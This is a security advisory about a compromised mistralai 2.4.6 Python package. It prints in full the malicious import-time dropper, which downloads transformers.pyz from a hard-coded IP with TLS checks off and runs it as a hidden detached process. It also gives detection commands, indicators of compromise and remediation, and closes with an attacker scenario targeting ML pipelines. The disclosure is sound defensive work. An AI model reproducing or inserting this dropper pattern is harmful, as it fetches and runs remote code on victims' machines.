GHSA-wx9m-wx4f-4cmg: mistralai 2.4.6: supply chain dropper executes on import

The `mistralai` PyPI package version `2.4.6` contains a malicious dropper that executes on import on Linux. No `v2.4.6` tag, commit, or release workflow run exists in this repository, the legitimate latest version before the upload was `2.4.5`, and the upload bypassed this repository's normal release pipeline (which uses PyPI Trusted Publishing). The `mistralai` PyPI project is currently quarantined. ## Affected - `mistralai==2.4.6` on PyPI. Versions `2.4.5` and earlier are not known to be affected. ## What the malicious code does A function named `_run_background_task` was added to `src/mistralai/client/__init__.py` and called at module-load time. Reproduced from the public report in [#523](https://github.com/mistralai/client-python/issues/523): ```python import subprocess as _sub import os as _os def _run_background_task(): if not _sys.platform.startswith("linux") or _os.environ.get("MISTRAL_INIT"): return _os.environ["MISTRAL_INIT"] = "1" _url = "https://83.142.209.194/transformers.pyz" _dest = "/tmp/transformers.pyz" try: if not _os.path.exists(_dest): _sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15) if _os.path.exists(_dest): _sub.Popen( [_sys.executable, _dest], stdout=_sub.DEVNULL, stderr=_sub.DEVNULL, start_new_session=True, env=_os.environ.copy() ) except: pass _run_background_task() ``` On Linux only, the function: 1. Returns early if `MISTRAL_INIT` is already set in the environment. 2. Sets `MISTRAL_INIT=1` so the spawned child does not re-trigger the dropper if it imports `mistralai`. 3. Downloads `https://83.142.209.194/transformers.pyz` to `/tmp/transformers.pyz` with `curl -k -L -s` (TLS verification disabled, 15 s timeout). Skips the download if the file is already present. 4. Spawns `transformers.pyz` with the current Python interpreter (`sys.executable`) as a detached process via `Popen(..., start_new_session=True)`, with stdout and stderr discarded and any exception silently swallowed. On non-Linux platforms the function returns immediately and does nothing. The trigger is `import mistralai`, not package installation. `pip install` of a wheel does not execute package code; for an sdist it runs PEP 517 build hooks but those are in `setup.py` / `pyproject.toml`, not in `__init__.py` — so `pip install`, `pip download`, and `pip wheel` do not invoke this dropper. The contents of `transformers.pyz` are not in the package and were not analyzed in this advisory. The behavior of the second-stage payload on the host is therefore unknown. ## Recommendation Any Linux environment that imported `mistralai==2.4.6` should be treated as potentially compromised pending forensic review. Rotate every credential reachable from the importing process and review host and cloud audit logs for activity from approximately 2026-05-12 00:05 UTC onward (per the timing reported in #523). ## Check whether you are affected Installed version: ```bash pip show mistralai | grep -i ^version ``` Dependency files and lockfiles: ```bash grep -n -E 'mistralai\b.*2\.4\.6' \ requirements*.txt pyproject.toml uv.lock poetry.lock Pipfile Pipfile.lock 2>/dev/null ``` Dropped file on disk: ```bash ls -la /tmp/transformers.pyz ``` The presence of `/tmp/transformers.pyz` on a host that imported `mistralai==2.4.6` indicates the download step ran successfully. Combined with absence of `MISTRAL_INIT` in the host's process environment history, it does not by itself confirm the second-stage executed; conversely its absence does not rule out execution if the file was cleaned up. ## Remediation 1. Pin `mistralai` to `2.4.5` or earlier. While the PyPI project is quarantined, install from this repository at a known-good tag, e.g. `git+https://github.com/mistralai/client-python.git@v2.4.5`. 2. On affected Linux hosts, rotate every credential reachable from the importing process and review host and cloud audit logs. ## Indicators of compromise All IOCs below come from the public report in [#523](https://github.com/mistralai/client-python/issues/523). - File: `/tmp/transformers.pyz` - Process: a Python interpreter (`sys.executable`) running `/tmp/transformers.pyz` detached from the parent's process group, with stdout/stderr to `/dev/null` - Environment variable: `MISTRAL_INIT=1` - Outbound HTTPS to `83[.]142[.]209[.]194` from `curl` (no TLS verification) - Function added to the package: `_run_background_task` in `src/mistralai/client/__init__.py` - SHA-256 of the malicious sdist (as reported in #523): `6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b` ## References - Public report with the dropper code: https://github.com/mistralai/client-python/issues/523 - Quarantined PyPI project: https://pypi.org/project/mistralai/

An adversary with sufficient access to push to the mistralai PyPI project (via compromised maintainer credentials or a PyPI platform-level weakness) publishes version 2.4.6, which passes superficial review since it increments the legitimate version number. A developer or CI/CD runner executes `pip install mistralai` without a version pin and receives 2.4.6. On the next pipeline run — a training job, an evaluation script, an agent workflow — `import mistralai` fires and `_run_background_task()` runs silently: it sets `MISTRAL_INIT=1` to avoid re-triggering, downloads `transformers.pyz` from `83.142.209.194` over unauthenticated HTTPS, and forks a detached Python process with all output discarded. The second-stage payload now runs with the full privileges of the ML engineer's process — access to cloud credentials, LLM API keys, training data, proprietary model weights, and internal infrastructure. Given that this is part of the documented 'mini-shai-hulud' campaign that simultaneously hit npm packages, the payload likely performs automated credential harvesting and exfiltration to adversary infrastructure.